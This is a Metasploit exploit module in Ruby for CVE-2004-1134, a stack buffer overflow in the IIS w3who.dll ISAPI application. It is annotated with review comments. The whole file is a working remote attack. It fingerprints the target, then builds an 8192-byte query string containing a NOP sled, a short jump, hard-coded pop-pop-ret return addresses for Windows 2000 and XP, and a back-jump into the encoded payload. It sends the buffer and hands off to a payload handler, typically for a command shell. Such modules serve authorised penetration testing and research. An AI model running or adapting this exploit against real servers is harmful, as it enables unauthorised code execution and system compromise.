Path: blob/master/modules/exploits/windows/isapi/w3who_query.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Exploit module for the w3who.dll ISAPI query-string stack overflow
# (CVE-2004-1134, see 'References' below). The module is HTTP-based:
# detection and delivery both go through a single request to the
# configured 'URL' path, so the only on-the-wire observable is an
# unusually long (8192-byte) query string sent to that path.
class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  # XXX: Needs custom body check. HttpFingerprint = { :pattern => [ // ] }
  include Msf::Exploit::Remote::HttpClient

  # Registers module metadata, payload constraints, targets and the
  # single user option 'URL' (path to w3who.dll, default
  # "/scripts/w3who.dll").
  #
  # @param info [Hash] metadata merged by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Microsoft IIS ISAPI w3who.dll Query String Overflow',
        'Description' => %q{
          This module exploits a stack buffer overflow in the w3who.dll ISAPI
          application. This vulnerability was discovered Nicolas
          Gregoire and this code has been successfully tested against
          Windows 2000 and Windows XP (SP2). When exploiting Windows
          XP, the payload must call RevertToSelf before it will be
          able to spawn a command shell.
        },
        'Author' => [ 'hdm' ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2004-1134' ],
          [ 'OSVDB', '12258' ],
          [ 'URL', 'http://www.exaprobe.com/labs/advisories/esa-2004-1206.html' ],
          [ 'BID', '11820' ]
        ],
        'Privileged' => false,
        'DefaultOptions' => {
          'EXITFUNC' => 'process',
        },
        'Payload' => {
          # 632 bytes is the room the encoded payload may occupy; see
          # the buffer layout in #exploit, which places the payload
          # immediately before the overwritten return slot.
          'Space' => 632,
          # Bytes the payload encoder must avoid: NUL, '+', '&', '=',
          # '%', LF, CR and space -- i.e. the characters that cannot be
          # carried verbatim inside a URL query string.
          'BadChars' => "\x00\x2b\x26\x3d\x25\x0a\x0d\x20",
          'MinNops' => 128,
          'StackAdjustment' => -3500,

        },
        'Platform' => 'win',
        # Each concrete target carries 'Rets' => [offset, address]:
        # offset is the index into the 8192-byte buffer where the
        # saved return slot sits, address is written there as a
        # little-endian 32-bit value (pack('V')) in #exploit.
        'Targets' => [
          ['Automatic Detection', {}],
          ['Windows 2000 RESKIT DLL [Windows 2000]', { 'Rets' => [ 48, 0x01169f4a ] }], # pop, pop, ret magic
          ['Windows 2000 RESKIT DLL [Windows XP]', { 'Rets' => [ 748, 0x10019f4a ] }], # pop, pop, ret magic
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2004-12-06',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptString.new('URL', [ true, "The path to w3who.dll", "/scripts/w3who.dll" ]),
      ]
    )
  end

  # Probes the configured URL once and picks a concrete target from
  # the response.
  #
  # A host is considered vulnerable when the body contains
  # "Access Token" (output characteristic of w3who.dll). The Server
  # header then selects the target: /5\.1/ (IIS 5.1) maps to the
  # Windows XP entry (targets[2]), anything else to the Windows 2000
  # entry (targets[1]).
  #
  # @return [Msf::Module::Target, nil] the selected target, or nil when
  #   there was no response or the body did not match
  def auto_target
    # -1 is passed as the request timeout argument of send_request_raw.
    res = send_request_raw(
      {
        'uri' => normalize_uri(datastore['URL'])
      }, -1
    )
    # Return value is discarded; the call only records the fingerprint.
    http_fingerprint({ :response => res }) # XXX: Needs custom body match

    # Was a vulnerable system detected?
    t = nil
    if (res and res.body =~ /Access Token/)
      case res.headers['Server']
      when /5\.1/
        t = targets[2]
      else
        t = targets[1]
      end
    end
    t
  end

  # Vulnerability check built on #auto_target.
  #
  # NOTE(review): a nil response (host unreachable, timeout) also falls
  # through to CheckCode::Safe, which overstates certainty; reporting
  # CheckCode::Unknown in that case would be more accurate.
  #
  # @return [Exploit::CheckCode] Appears when a target was selected,
  #   Safe otherwise
  def check
    if auto_target
      return Exploit::CheckCode::Appears
    end

    Exploit::CheckCode::Safe
  end

  # Resolves the target (running auto-detection for the 'Automatic'
  # entry), builds the 8192-byte query string and sends it.
  #
  # Buffer layout, relative to the target's Rets[0] offset:
  #   [Rets[0] - 4, 4]   two NOPs followed by "\xeb\x04"
  #   [Rets[0],     4]   Rets[1] packed little-endian
  #   [Rets[0] + 4, 4]   "\xe9" followed by -641 packed little-endian
  #   the encoded payload ends 4 bytes before Rets[0]
  # Everything else is random English text free of payload badchars.
  #
  # @raise fail_with(Failure::NoTarget) when auto-detection returns nil
  def exploit
    if (target.name =~ /Automatic/)
      mytarget = auto_target
    else
      mytarget = target
    end

    if not mytarget
      fail_with(Failure::NoTarget, "No valid target found")
    end

    # Writes below are in-place slice assignments on the same String;
    # the offset arithmetic is target-specific, do not reorder.
    buf = rand_text_english(8192, payload_badchars)
    buf[mytarget['Rets'][0] - 4, 4] = make_nops(2) + "\xeb\x04"
    buf[mytarget['Rets'][0] - 0, 4] = [ mytarget['Rets'][1] ].pack('V')
    buf[mytarget['Rets'][0] + 4, 4] = "\xe9" + [-641].pack('V')
    buf[mytarget['Rets'][0] - 4 - payload.encoded.length, payload.encoded.length] = payload.encoded

    print_status("Sending request...")
    # The response is never inspected; `r` is assigned but unused.
    # 5 is the request timeout argument of send_request_raw.
    r = send_request_raw({
      'uri' => normalize_uri(datastore['URL']),
      'query' => buf
    }, 5)

    # Hand off to the payload handler after the request is sent.
    handler
  end
end